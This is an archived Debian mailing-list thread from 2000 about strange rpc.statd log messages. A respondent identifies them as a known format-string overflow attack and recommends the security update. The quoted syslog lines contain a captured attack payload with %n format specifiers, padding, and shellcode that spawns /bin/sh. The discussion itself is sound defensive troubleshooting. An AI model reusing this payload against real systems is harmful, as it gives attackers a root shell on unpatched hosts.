Re: weird rpc.statd messages on potato

To: Rob <robert@namodn.com>
Cc: debian-user@lists.debian.org
Subject: Re: weird rpc.statd messages on potato
From: Damian Menscher <menscher@uiuc.edu>
Date: Mon, 6 Nov 2000 22:46:33 -0600 (CST)
Message-id: <[🔎] Pine.LNX.4.21.0011062241200.26714-100000@intellx1.physics.uiuc.edu>
Reply-to: Damian Menscher <menscher@uiuc.edu>
In-reply-to: <[🔎] 20001106203953.D499@namodn.com>

On Mon, 6 Nov 2000, Rob wrote:

> Hmm, well we're on nfs-utils (1:0.1.9.1-1), so would that mean
> that someone is trying the exploit on us? Any way to tell where
> this is coming from?

Given that you're running an up-to-date nfs-utils, they didn't get
in.  So the only info you have on them is the log messages.  So no,
there's no way to tell where it came from, unless you do some other sort
of logging (like running a packet sniffer at the time of the attack).

> BTW, what was the exploit, some kind of overflow?

Yes, it was an overflow.  Basically overflowing a format string
vulnerability when rpc.statd attempts to log to syslog(), which of
course runs as root.  More information can be found at
www.securityfocus.com by clicking on Vulnerabilities and searching for
keyword statd.

Damian

> On Mon, Nov 06, 2000 at 10:29:04PM -0600, Damian Menscher wrote:
> > On Mon, 6 Nov 2000, Rob wrote:
> > 
> > > Getting the following in our /var/log/messages
> > > 
> > > We use NFS between two Potato boxes, this appears on
> > > both :
> > > 
> > > Nov  6 08:03:19 rudy Ç^F/binÇF^D/shA0À?F^G?v^L?V^P?N^L?ó°^KÍ?°^AÍ?èÿÿÿ
> > > Nov  6 08:03:21 rudy 173>Nov  6 08:03:21 /sbin/rpc.statd[152]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1Àë|Y?A^P?A^HþÀ?A^D?ÃþÀ?^A°fÍ?³^B?Y^LÆA^N?ÆA^H^P?I^D?A^D^L?^A°fÍ?³^D°fÍ?³^E0À?A^D°fÍ
> > > Nov  6 08:03:21 rudy Ç^F/binÇF^D/shA0À?F^G?v^L?V^P?N^L?ó°^KÍ?°^AÍ?èÿÿÿ
> > 
> > Congratulations!  Assuming you haven't patched past the default install,
> > you've just been hacked!
> > 
> > This is a well-known attack on rpc.statd that was first publicized on
> > bugtraq in mid-July (you can search the archives at
> > www.securityfocus.com).  If you haven't updated your potato since then,
> > you're probably a goner.  According to the page
> > www.debian.org/security/2000/20000719a if you're running nfs-common
> > 0.1.9.1-1 or later you should be safe.  Otherwise reinstall and apt-get
> > the security updates this time.

Damian Menscher
-- 
--==## Grad. student & Sys. Admin. @ U. Illinois at Urbana-Champaign ##==--
--==## <menscher@uiuc.edu> www.uiuc.edu/~menscher/ Ofc:(217)333-0038 ##==--
--==## Physics Dept, 1110 W Green, Urbana IL 61801 Fax:(217)333-9819 ##==--

Reply to:

References:
- Re: weird rpc.statd messages on potato
  - From: Rob <robert@namodn.com>

Prev by Date: Re: MD5 Check (was Re: i am hacked atm.. what's better thing to do?)
Next by Date: Re: XFree86 4.0.1 crashes hard
Previous by thread: Re: weird rpc.statd messages on potato
Next by thread: Re: weird rpc.statd messages on potato
Index(es):
- Date
- Thread